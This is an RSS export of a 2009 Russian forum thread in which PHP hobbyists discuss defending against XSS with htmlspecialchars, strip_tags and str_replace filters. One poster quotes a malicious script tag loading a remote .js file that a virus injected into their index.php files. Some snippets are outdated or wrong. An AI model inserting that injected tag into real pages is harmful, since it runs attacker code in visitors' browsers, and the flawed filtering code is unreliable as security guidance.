Безопасность от тега script !

Безопасность от тега script ! - Visavi.net https://visavi.net/ RSS - Visavi.net https://visavi.net/assets/img/images/logo_small.png RSS - Visavi.net https://visavi.net/ [email protected] (admin) [email protected] (admin) Sat, 16 Nov 2024 17:36:21 +0300 49, хаха я и не заметил Гг https://visavi.net/topics/588/27061 Безопасность от тега script ! Александр Sat, 17 Jan 2009 19:05:17 +0300 Сообщения https://visavi.net/topics/588/27061 49. <img src="https://visavi.net/uploads/stickers/xaxa.gif" alt="xaxa"> убил https://visavi.net/topics/588/27060 Безопасность от тега script ! Удаленный Sat, 17 Jan 2009 17:05:39 +0300 Сообщения https://visavi.net/topics/588/27060 47, спасибо! +1 https://visavi.net/topics/588/27058 Безопасность от тега script ! Сергей Fri, 16 Jan 2009 14:46:14 +0300 Сообщения https://visavi.net/topics/588/27058 45,есле будыт какие нибудь ошибки в тэгах то он вобще весь текст не отфильтрует//46,есле не будиш переходить https://visavi.net/topics/588/27057 Безопасность от тега script ! Александр Fri, 16 Jan 2009 14:43:26 +0300 Сообщения https://visavi.net/topics/588/27057 кстати... я поймал на комп вирус и он во все файлы index.php в самом низу прописал вот это <script src="http://www.52cps.com/img/ccs.js"></script> от вируса я избавился переустановкой винды. опасен ли этот тег если файл с ним находится в компе? https://visavi.net/topics/588/27056 Безопасность от тега script ! Сергей Fri, 16 Jan 2009 14:31:08 +0300 Сообщения https://visavi.net/topics/588/27056 44,Как? <img src="https://visavi.net/uploads/stickers/ded.gif" alt="ded"> https://visavi.net/topics/588/27055 Безопасность от тега script ! Удаленный Fri, 16 Jan 2009 13:26:34 +0300 Сообщения https://visavi.net/topics/588/27055 Ошибся 39*-40 https://visavi.net/topics/588/27054 Безопасность от тега script ! Александр Fri, 16 Jan 2009 09:36:39 +0300 Сообщения https://visavi.net/topics/588/27054 39,ее можна обмануть(( https://visavi.net/topics/588/27053 Безопасность от тега script ! Александр Fri, 16 Jan 2009 09:34:54 +0300 Сообщения https://visavi.net/topics/588/27053 39, Что мешает сначало применить htmlspecialchars(), а потом nl2br() ? И переносы заменятся на и строка приведётся к HTML эквивалентам.... https://visavi.net/topics/588/27052 Безопасность от тега script ! Удаленный Fri, 16 Jan 2009 07:54:32 +0300 Сообщения https://visavi.net/topics/588/27052 <pre class="prettyprint"> $msg=striptags($msg,"<script>"); </pre> #39, ENT_QUOTES - разрешить трансляцию любых кавычек ENT_NOQUOTES - запретить трансляцию любых кавычек https://visavi.net/topics/588/27051 Безопасность от тега script ! Удаленный Fri, 16 Jan 2009 01:49:04 +0300 Сообщения https://visavi.net/topics/588/27051 Ну а striptags ? https://visavi.net/topics/588/27050 Безопасность от тега script ! Удаленный Fri, 16 Jan 2009 01:43:46 +0300 Сообщения https://visavi.net/topics/588/27050 хтмлспециалчарс не всегда применим. иногда надо разрешить выполнение каких ни будь тегов например. + <бр> вылазиет вместо переноса строки. а че дает энд квотс? а то я че то не вникал. https://visavi.net/topics/588/27049 Безопасность от тега script ! Удаленный Fri, 16 Jan 2009 01:33:36 +0300 Сообщения https://visavi.net/topics/588/27049 Мля... <pre class="prettyprint"> <?php $message = htmlspecialchars($message, ENT_QUOTES); ?> </pre> https://visavi.net/topics/588/27048 Безопасность от тега script ! Удаленный Thu, 15 Jan 2009 20:41:05 +0300 Сообщения https://visavi.net/topics/588/27048 Подобную шляпу выкиньте в топку нах... $msg = str_replace('<','',$msg); $msg = str_replace('./','',$msg); $msg = str_replace("'","",$msg); $msg = str_replace('"','',$msg); $msg = str_replace('>','',$msg); $msg = str_replace(';','',$msg); Достаточно сделать так против XSS: [code] <?php $message = htmlspecialchars($message, ENT_QUOTES); ?> [/copy] А всякие вырезания знаков str_replece'ом - в топку! Нужно вырезать только ту последовательность знаков, которая используется в качестве разделителя в файлах (это в случае, если данные хранется НЕ в БД, а в файлах!). https://visavi.net/topics/588/27047 Безопасность от тега script ! Удаленный Thu, 15 Jan 2009 20:39:47 +0300 Сообщения https://visavi.net/topics/588/27047 еще вопросик. Например такой путь <pre class="prettyprint"><? $fp=fopen("$maindir/forum/data/users/$login.log","r+" );</pre> я пишу так <pre class="prettyprint"><? $fp=fopen(''.check($maindir).'/forum/data/users/'.chec k($login.log).'','r+');</pre> Будет ли от этого какая нить польза и прально ли написал? https://visavi.net/topics/588/27046 Безопасность от тега script ! Arab Wed, 07 Jan 2009 13:46:36 +0300 Сообщения https://visavi.net/topics/588/27046